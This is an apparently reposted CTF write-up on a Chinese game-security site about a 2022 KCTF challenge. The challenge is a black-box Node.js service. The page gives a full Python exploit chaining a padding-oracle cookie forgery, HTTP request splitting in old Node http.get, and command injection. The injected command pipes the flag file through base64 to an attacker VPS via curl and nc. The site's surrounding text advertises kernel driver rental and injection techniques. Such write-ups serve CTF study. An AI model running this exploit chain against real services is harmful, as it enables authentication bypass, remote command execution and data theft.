Canvas is not supported in your browser.
首页 课程 文章
无痕注入 APC注入 线程注入 读写驱动 注入技术 句柄表 进程线程 系统调用 保护模式 内存管理 远程CALL 软件调试 驱动封装 云下发 驱动开发 FPS数据 方框透视 FPS方框 FPS自瞄 CE D3DHOOK D3D绘制 Imgui绘制 DWM
内核课程 驱动出租 学习路线 聊天室 免责声明 提问技巧

CTF对抗-2022秋KCTF防守方提交题目

推荐 原创

周杰伦

文章分类 游戏逆向 游戏开发 编程技术 加壳脱壳 阅读数 : 616 阅读时长 : 9分钟

作者(Achilles)来自星盟安全团队

 

这是一个node项目,题目需要比赛者ssrf进而命令执行获得藏在比赛题目源代码中的flag。黑盒,不给源代码附件。

 

先访问/admin,发现它是解密cookie判断是不是管理员,用padding oracle attack伪造管理员cookie

 

http.get函数在node的8版本(其中的较低版本)或者更低版本存在被http拆分攻击危险。攻击者通过这个漏洞可以达到http走私的效果。

 
 

下面是一把梭脚本,注意把这个脚本放在这个项目https://github.com/pspaul/padding-oracle文件夹里面。这个脚本执行的命令是

1
curl xxxx:xxx / ?`cat flag|grep flag|base64`

在vps那里nc,收到后base64解密后得到flag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# -*- coding: utf-8 -*-
import urllib.parse
from http.cookies import SimpleCookie
import requests
from padding_oracle import PaddingOracle
from optimized_alphabets import json_alphabet
 
attackIP = ""
attackPort = ""
vpsIP = ""
vpsPort = ""
 
def payload_encode(raw):
     payload = raw.replace( '\n' , '\u010d\u010a' ) \
         .replace( '+' , '\u012b' ) \
         .replace( ' ' , '\u0120' ) \
         .replace( '"', '\u0122') \
         .replace("'", '\u0a27') \
         .replace('[', '\u015b') \
         .replace(']', '\u015d') \
         .replace('`', '\u0127') \
         .replace('"' , '\u0122' ) \
         .replace( "'" , '\u0a27') \
         .replace( '[' , '\u015b' ) \
         .replace( ']' , '\u015d' )
     return payload
 
def oracle(cipher_hex):
     headers = { 'Cookie' : "isadmin={}" . format (cipher_hex)}
     r = requests.get( "http://" + attackIP + ":" + attackPort + "/admin" ,headers = headers)
     response = r.content
     if b "Decrypt error" not in response:
         return True
     else :
         return False
 
def step1():
     r = requests.get(url = "http://" + attackIP + ":" + attackPort)
     cookie = SimpleCookie(r.headers[ 'Set-Cookie' ])
     cookie = cookie[ "isadmin" ].value
     return cookie
 
def step2(cipher):
     o = PaddingOracle(oracle, max_retries = - 1 )
     plain, _ = o.decrypt(cipher, optimized_alphabet = json_alphabet())
     plain_new = b "{\"admin\":\"1\"}"
     cipher_new = o.craft(cipher, plain, plain_new)
     return cipher_new
 
def step3(new_cookie):
     payload = " HTTP/1.1\n\nPOST /C00mmmmanD HTTP/1.1\nHost: 127.0.0.1\nCookie: isadmin={}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 72\n\ncmd=curl%20" + vpsIP + "%3A" + vpsPort + "%3F%60cat%20flag%7Cgrep%20flag%7Cbase64%60\n\nGET / HTTP/1.1\ntest:"
     payload = payload. format (new_cookie)
     payload = payload_encode(payload)
     r = requests.get( "http://" + attackIP + ":" + attackPort + "/search?url=http://127.0.0.1:" + attackPort + "/" + urllib.parse.quote(payload))
 
 
if __name__ = = "__main__" :
     cookie = step1()
     new_cookie = step2(cookie)
     step3(new_cookie)


更多【2022秋KCTF防守方提交题目】相关视频教程:www.yxfzedu.com




相关文章推荐

记录自己的技术轨迹
文章规则:
1):文章标题请尽量与文章内容相符
2):严禁色情、血腥、暴力
3):严禁发布任何形式的广告贴
4):严禁发表关于中国的政治类话题
5):严格遵守中国互联网法律法规
6):有侵权,疑问可发邮件至service@yxfzedu.com
近期原创 更多
友情链接
内核结构 FAQ
免责声明
课程目录
Windows内核
游戏逆向(FPS)
技术交流QQ群
342478842 215039827 137189196
314055665 159620936
微信公众号
www.yxfzedu.com是一个分享游戏安全,游戏外挂与反外挂,游戏驱动保护的视频网站!
接各种驱动定制如:游戏读写驱动,软件内存保护,防止调试等功能定制。
出租读写驱动,调试驱动,无痕注入支持各种游戏。
邮箱:service@yxfzedu.com
QQ:851920120
特别说明:不接游戏数据分析,外挂编写,登陆协议等类似业务。